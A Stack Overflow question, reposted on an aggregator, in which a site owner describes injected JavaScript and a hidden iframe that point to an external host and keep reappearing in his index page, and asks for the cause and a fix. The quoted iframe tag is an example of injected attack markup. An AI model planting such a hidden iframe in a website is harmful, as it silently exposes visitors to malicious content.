iframe/script attack to website
Posted
by Ram
on Stack Overflow
See other posts from Stack Overflow
or by Ram
Published on 2009-06-13T09:53:16Z
Indexed on
2010/04/18
13:33 UTC
Read the original article
Hit count: 448
I faced a website attack problem that some malicious javascript code added to all pages in my webiste.
Recently I faced another problem that my website is attacked with the following "iframe" tag.
iframe src="http://shopmovielife.cn:8080/index.php" width=127 height=167 style="visibility: hidden"
Even if I remove this tag, the index file of website is updated on daily basis. What would be the reason for this behaviour?
Please give me a solution to solve this.
© Stack Overflow or respective owner